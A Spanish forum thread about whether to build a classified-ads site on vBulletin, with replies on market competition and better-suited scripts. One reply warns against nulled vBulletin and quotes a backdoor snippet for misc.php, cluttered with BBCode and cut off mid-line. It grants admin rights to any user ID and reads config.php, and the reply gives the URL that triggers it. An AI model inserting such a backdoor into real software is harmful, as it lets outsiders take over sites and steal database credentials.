Pagina de anuncios clasificados con vbulletin, me lo recomiendan?

lucasz12 Seguir

Dseda
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
15 Feb 2013
Estoy interesado en un proyecto que sea compatible con google adesense y muchas beses no se para que lado salir pido consejos y no me va bien, la idea seria intentar montar un foro de anuncios clasificados, la idea seria si tendrá bien resultado puesto que mi gran problema es que no se para que lado arrancar , como a muchos les abra pasado alguna ves y hoy ganan fortunas jeje, bueno sin irme demasiado de tema, seria recomendable montar un foro de anuncios clasificados con este script puesto que no e visto ninguno, va si 1 solo pero muy viejo, espero sus consejos.

Última edición:

spear

No recomendado
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
2 Nov 2012
Estoy interesado en un proyecto que sea compatible con google adesense y muchas beses no se para que lado salir pido consejos y no me va bien, la idea seria intentar montar un foro de anuncios clasificados, la idea seria si tendrá bien resultado puesto que mi gran problema es que no se para que lado arrancar , como a muchos les abra pasado alguna ves y hoy ganan fortunas jeje, bueno sin irme demasiado de tema, seria recomendable montar un foro de anuncios clasificados con este script puesto que no e visto ninguno, va si 1 solo pero muy viejo, espero sus consejos.

si eres de españa olvidate de ese proyecto

spear

No recomendado
Desde
2 Nov 2012

Simplemente por que en españa hay mucha demanda sobre eso y hay 2 o 3 webs muy grandes que llevan el 90 % de trafico que cualquier español saben cuales son y aun mas con presupuestos enormes y anuncios de publicidad incluso en television en horarios de share alto eso quiere decir que pagaron varios millones por ese anuncio .Bajo mi experiencia yo mismo tuve una web de clasificados y al año la cerre por que era imposible competir con las webs grandes y apenas conseguia anuncios y llevaba invertido 400 usd y en 1 año no recupere ni 40 usd ,es como si alguien quiere hacer una red social y competir contra facebook es bastante complicado ganarle .Dicho esto para otros paises latinos quizas sea rentable solo se tendria que estudiar el mercado y ver que competidores hay en latinoamerica y decir si se podria competir con ellos o porlomenos acercarse .Siento desanimarte amigo no es mi intencion pero te deseo suerte si lo sigues con el proyecto .

lucasz12

Dseda
Verificado por Whatsapp
Desde
15 Feb 2013
Simplemente por que en españa hay mucha demanda sobre eso y hay 2 o 3 webs muy grandes que llevan el 90 % de trafico que cualquier español saben cuales son y aun mas con presupuestos enormes y anuncios de publicidad incluso en television en horarios de share alto eso quiere decir que pagaron varios millones por ese anuncio .Bajo mi experiencia yo mismo tuve una web de clasificados y al año la cerre por que era imposible competir con las webs grandes y apenas conseguia anuncios y llevaba invertido 400 usd y en 1 año no recupere ni 40 usd ,es como si alguien quiere hacer una red social y competir contra facebook es bastante complicado ganarle .Dicho esto para otros paises latinos quizas sea rentable solo se tendria que estudiar el mercado y ver que competidores hay en latinoamerica y decir si se podria competir con ellos o porlomenos acercarse .Siento desanimarte amigo no es mi intencion pero te deseo suerte si lo sigues con el proyecto .

Yo soy de argentina y veo mal si estas en internet solo enfocarte a 1 solo país, yo me centraría en todo país de habla hispana es lo mejor, pero mi cuestión es si lo hago o no con vbulletin mas aya de eso, puesto que la plataforma no debería importar mucho hay paginas que están bien feas y ahí están bueno espero mas opiniones.

Plaga

Moderador
1
Sigma
Verificado
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
¡Excelente comerciante!
Suscripción a IA
Desde
15 Abr 2009
Si vas a hacer un sitio de anuncios clasificados, pues lo más viable será usar una plataforma desarrollada para ello.
vbulletin es más enfocado para foros, mejor desde el principio compra el CMS desarrollado para clasificados.

schubert

Gamma
Verificado por Whatsapp
Desde
21 Sep 2010
Hace un tiempo estuve interesado en lo mismo luego por motivos personales deje de investigar, lo que me parece que es mejor un script como el que ofrece el usuario [MENTION=39355]Torrecilla[/MENTION]s ,se simplifica mas el trabajo que si usas una plataforma de foro,saludos y suerte con el proyecto :p8:

Gravity

Beta
Desde
6 Oct 2013
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Así es vBulletin sirve mejor como foro, para desarrollar algo como una web de clasificados puede ser algun script tipo e-comerce.

lucasz12

Dseda
Verificado por Whatsapp
Desde
15 Feb 2013
Hace un tiempo estuve interesado en lo mismo luego por motivos personales deje de investigar, lo que me parece que es mejor un script como el que ofrece el usuario [MENTION=39355]Torrecilla[/MENTION]s ,se simplifica mas el trabajo que si usas una plataforma de foro,saludos y suerte con el proyecto :p8:

Pasa que la licencia ya la tengo para usar en 2 web 1 ya la estoy usando y me quedo la otra libre y el scrit ese ta bueno pero lo cobran mucho para mi gusto vale menos algo mas complejo como vbullitin, pero para opiniones abri este tema así que esta bien, igual sigo con la idea de usar vbullitin sino lo largue es por que tengo problemas con adesense temporalmente y para clasificados es lo ideal.

elfenny

No recomendado
Verificado por Whatsapp
Desde
1 May 2012
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
Te gustaria algo como estos: Panjo Marketplace Panjo Marketplace ?

blogers

Pi
SEO
Desde
22 Ago 2010
comprate un script especialmente para los clasificados [MENTION=39355]Torrecilla[/MENTION] vende uno creo que se enfoca a los clasificados en español

ZUCCO

Gamma
Desde
20 Abr 2009
asi es, tengo una web la cual quiero empezar con un foro vb pero tengo miedo si usos vb nulled que pasa?

Primero, si es que la compañia vbulletin te encuentra usando su software sin licencia le pide a tu proveedor hosting que te oblige a quitar el software o a comprar la licencia. Ahora si tu proveedor es uno serio con prestigio te hara que canceles tu web y que uses otro sistema de foros gratuitos como MYBB o SMF.

Segundo, los foros "null" son modificados para que puedan ser instalados sin licencia, asi que el que modifica esos archivos puede maliciosamente colocar un script para mas adelante hackearte el foro, te cito un ejemplo que leí por hay:

Insertar CODE, HTML o PHP:
Alguien que te da vbulletin null puede agregar la [COLOR=#000000][FONT=Times New Roman] linea de codigo en el archivo misc.php justo despues de [/FONT][/COLOR]
[COLOR=#000000][FONT=Times New Roman]

[COLOR=#007700]([/COLOR][COLOR=#0000BB]$hook [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]vBulletinHook[/COLOR][COLOR=#007700]::[/COLOR][COLOR=#0000BB]fetch_hook[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'misc_start'[/COLOR][COLOR=#007700])) ? eval([/COLOR][COLOR=#0000BB]$hook[/COLOR][COLOR=#007700]) : [/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700];  
[/COLOR]
[/FONT][/COLOR]
[COLOR=#000000][FONT=Times New Roman]lo que le puso fue lo siguiente[/FONT][/COLOR]

[COLOR=#000000][FONT=Times New Roman]

[COLOR=#007700]if ([/COLOR][COLOR=#0000BB]$_REQUEST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'do'[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'Jhonnyf'[/COLOR][COLOR=#007700])
{
    [/COLOR][COLOR=#0000BB]$userid [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]input[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]clean_gpc[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'r'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TYPE_INT[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]$grupoid [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]input[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]clean_gpc[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'r'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'grupoid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TYPE_INT[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]$db[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]query_read_slave[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"update " [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]TABLE_PREFIX [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#DD0000]"user AS user
        SET usergroupid=[/COLOR][COLOR=#0000BB]$grupoid[/COLOR][COLOR=#DD0000]
        WHERE userid=[/COLOR][COLOR=#0000BB]$userid[/COLOR][COLOR=#DD0000]
    "[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]$filename [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"./includes/config.php"[/COLOR][COLOR=#007700];
    [/COLOR][COLOR=#0000BB]$handle [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fopen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$filename[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"r"[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]$contents [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]fread[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$handle[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]filesize[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$filename[/COLOR][COLOR=#007700]));
    [/COLOR][COLOR=#0000BB]fclose[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$handle[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"Content-type: text/plain;charset=iso-8859-
[/COLOR]
[/FONT][/COLOR][COLOR=#000000][FONT=Times New Roman]asi que cuando el se registre en tu foro y le den su ID de usuario (por ejemplo el 1542) solo tendrá que poner esto[/FONT][/COLOR]
[B]http://tu_foro.com/misc.php?do=Jhonnyf&userid=1542&grupoid=6

y listo, Ya será un [B]Admin (puede cambiar de grupo si no le resulta o usas uno diferente) y de pasadito vee todo el contenido de tu [B]config.php para entrar via [B]MyphpAdmin a tu base de datos y borrar todo lo que quiera
[/B][/B][/B][/B]

Última edición:

lucasz12

Dseda
Verificado por Whatsapp
Desde
15 Feb 2013
ya opte por otra temática me parece demacido problemática la verdad...